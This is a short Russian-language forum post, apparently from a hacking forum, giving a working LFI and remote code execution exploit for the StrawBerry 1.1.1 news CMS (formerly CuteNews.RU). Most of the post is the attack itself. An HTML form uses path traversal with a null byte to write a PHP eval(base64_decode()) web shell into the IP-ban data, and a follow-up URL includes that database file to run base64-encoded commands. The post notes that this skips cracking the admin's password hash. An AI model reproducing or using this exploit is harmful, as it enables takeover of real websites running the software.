Если я неправ поправьте. Это названия версии движка было недавно переминовано с CuteNews на Strawberry. Strawberry Теперь новостной скрипт CuteNews.RU называется Strawberry!
StrawBerry 1.1.1 LFI / Remote Code Execution Exploit Развивая тему _/showpost.php?p=953944&postcount=71 Выполняем POST-запрос: Code: <form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00"> <input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>"> <input type="hidden" name="action" value="add"> <input type="hidden" name="mod" value="ipban"> <input type="submit" value="First time"> </form> Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00 + Не нужно расшифровывать md5(md5()) хеш админа. Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.